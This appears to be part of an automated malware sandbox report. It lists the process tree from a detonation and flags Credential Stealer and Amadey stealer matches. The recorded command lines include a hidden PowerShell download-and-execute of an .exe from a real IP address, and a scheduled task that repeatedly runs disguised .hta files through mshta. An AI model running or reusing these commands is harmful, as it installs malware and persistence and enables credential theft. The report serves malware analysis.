                                                                                                                                                                                                                                                    Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                                    Start time:09:43:28
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                                    Start time:09:43:28
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                                    Start time:09:43:30
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:mshta "C:\Temp\.hta"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7b3970000
                                                                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                                    Start time:09:43:30
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /delete /tn "AutoRunHTA" /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                                    Start time:09:43:31
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                                                    Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                                    Start time:09:43:31
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                                    Start time:09:43:31
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                                    Start time:09:43:32
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                                    Start time:09:43:32
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                                    Start time:09:43:32
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\18EB.tmp\18EC.tmp\18ED.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:93'696 bytes
                                                                                                                                                                                                                                                    MD5 hash:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\1B0E.tmp\1B0F.tmp\1B10.bat C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                                                                    Start time:09:43:33
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0xe00000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                                                                    Start time:09:43:34
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\wOXcVegx\jyidkjkfhjawd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\wOXcVegx\jyidkjkfhjawd.exe"
                                                                                                                                                                                                                                                    Imagebase:0x880000
                                                                                                                                                                                                                                                    File size:1'282'048 bytes
                                                                                                                                                                                                                                                    MD5 hash:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000041.00000003.2682807652.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000041.00000003.2674898719.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                                                                    Start time:09:43:36
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7ac430000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                                                                    Start time:09:43:36
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                    Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:69
                                                                                                                                                                                                                                                    Start time:09:43:38
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:mshta "C:\Temp\.hta"
                                                                                                                                                                                                                                                    Imagebase:0x7ff7b3970000
                                                                                                                                                                                                                                                    File size:14'848 bytes
                                                                                                                                                                                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:70
                                                                                                                                                                                                                                                    Start time:09:43:38
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                                                    Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:71
                                                                                                                                                                                                                                                    Start time:09:43:38
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:72
                                                                                                                                                                                                                                                    Start time:09:43:39
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                                                    Imagebase:0xc00000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000048.00000002.2597235360.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:73
                                                                                                                                                                                                                                                    Start time:09:43:39
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /delete /tn "AutoRunHTA" /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:74
                                                                                                                                                                                                                                                    Start time:09:43:40
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                                                    Imagebase:0x7ff70fe90000
                                                                                                                                                                                                                                                    File size:235'008 bytes
                                                                                                                                                                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:75
                                                                                                                                                                                                                                                    Start time:09:43:43
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                                                    Imagebase:0xc00000
                                                                                                                                                                                                                                                    File size:3'220'480 bytes
                                                                                                                                                                                                                                                    MD5 hash:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000004B.00000002.2646109112.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:76
                                                                                                                                                                                                                                                    Start time:09:44:09
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                                                                                                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                                                                                                                    File size:50'265'898 bytes
                                                                                                                                                                                                                                                    MD5 hash:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 9%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:77
                                                                                                                                                                                                                                                    Start time:09:44:15
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                    File size:2'013'088 bytes
                                                                                                                                                                                                                                                    MD5 hash:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:123
                                                                                                                                                                                                                                                    Start time:09:44:42
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:255
                                                                                                                                                                                                                                                    Start time:09:47:45
                                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                      Function 6C486E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2120,6C487E60), ref: 6C486EBC
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C486EDF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C486EF3
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6C486F25
                                                                                                                                                                                                                                                        • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
